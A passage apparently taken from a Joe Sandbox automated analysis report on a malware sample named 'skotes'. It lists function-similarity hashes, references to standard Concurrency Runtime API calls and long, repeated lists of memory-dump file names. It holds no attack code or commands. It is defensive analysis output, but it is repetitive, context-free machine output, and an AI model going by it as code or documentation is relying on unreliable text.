                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2363638799-0
                                                                                                                                                                                                                                                                • Opcode ID: fbb09a8aa3612ce63c25ecd8450cf27a9c29fcdbc79d438589a98ce9326b26dc
                                                                                                                                                                                                                                                                • Instruction ID: 95c266dd680eb6f4776b0afa3f20e9fb9bacf5343f5a8af0711c2d268468320d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbb09a8aa3612ce63c25ecd8450cf27a9c29fcdbc79d438589a98ce9326b26dc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A518F31A00205DBDF25DF60C995FADB775AF44310F1A80ADE9067B396CB71AE06CBA1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • NtFlushProcessWriteBuffers.NTDLL ref: 00ABCBAA
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BuffersFlushProcessWrite
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2982998374-0
                                                                                                                                                                                                                                                                • Opcode ID: bb83f001ec2c206c49217148327a2ac220155e60cd96a6e7d829a8aae1d153d3
                                                                                                                                                                                                                                                                • Instruction ID: adc4bfabe69dfd03701bf56c75428e4b575994dd2fa0748211ec361e5a0b8be3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb83f001ec2c206c49217148327a2ac220155e60cd96a6e7d829a8aae1d153d3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6AB09232A1383047CA616B94BC089EE77189A80E2130A4156E982A72358E111D828FE4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: f3c8cedc5775c437c37536c613ad7bb62eb3883347a3fa1d5887f736377b27a9
                                                                                                                                                                                                                                                                • Instruction ID: 5a2ee8771063ae3aaa18cba6896e8a991aa1e1aee4cdc7b0ce231dba9795e7fc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3c8cedc5775c437c37536c613ad7bb62eb3883347a3fa1d5887f736377b27a9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8651C072A047068FEB25CF58D8847AEBBF5FB68314F24856AC409EB652E734E904CF50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00AD26E3
                                                                                                                                                                                                                                                                  • Part of subcall function 00AD24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00AD2504
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00AD2704
                                                                                                                                                                                                                                                                • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00AD2711
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00AD275F
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 00AD27E6
                                                                                                                                                                                                                                                                • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 00AD27F9
                                                                                                                                                                                                                                                                • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00AD2846
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929629596.0000000000D9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929809812.0000000000D9E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930137301.0000000000DA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930349428.0000000000DAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930501873.0000000000DB0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_aa0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2530155754-0
                                                                                                                                                                                                                                                                • Opcode ID: 4c6d49ab6b823b8403541866a6f09ace2cfe538e217f271b67b31ae570201b24
                                                                                                                                                                                                                                                                • Instruction ID: 5053b20acedbcc7e5bfa9f9786954c6668924920008b8b12f75cfb403a045490
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c6d49ab6b823b8403541866a6f09ace2cfe538e217f271b67b31ae570201b24
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A381B074904249AFDF16DFA4CA51BFE7BB2AF65304F04009AEC522B352C7328D56EB61
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00AD2982
                                                                                                                                                                                                                                                                  • Part of subcall function 00AD24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00AD2504
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00AD29A3
                                                                                                                                                                                                                                                                • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00AD29B0
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 00AD29FE
                                                                                                                                                                                                                                                                • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00AD2AA6
                                                                                                                                                                                                                                                                • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00AD2AD8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2918299044.0000000000AA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918155049.0000000000AA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918299044.0000000000B02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918657333.0000000000B09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918781754.0000000000B0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2918905078.0000000000B17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919668580.0000000000C6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919864554.0000000000C6D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C86000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2919997888.0000000000C93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920217132.0000000000C96000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920342171.0000000000C9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920541363.0000000000CAE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920704707.0000000000CAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2920838352.0000000000CC1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921066699.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921230726.0000000000CC5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921568726.0000000000CD7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921790614.0000000000CEC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2921963784.0000000000CF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922215422.0000000000CFE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922673396.0000000000D05000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923028432.0000000000D06000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923406574.0000000000D08000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924218896.0000000000D0F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924617491.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2924838611.0000000000D1D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925034458.0000000000D1E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925363220.0000000000D1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2925708484.0000000000D26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926049228.0000000000D28000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926438920.0000000000D2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926662982.0000000000D2F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2926853097.0000000000D30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927583632.0000000000D41000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D43000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2928697071.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2929285214.0000000000D9A000.00000040.00000001.01000000.00000007.sdmpDownload File
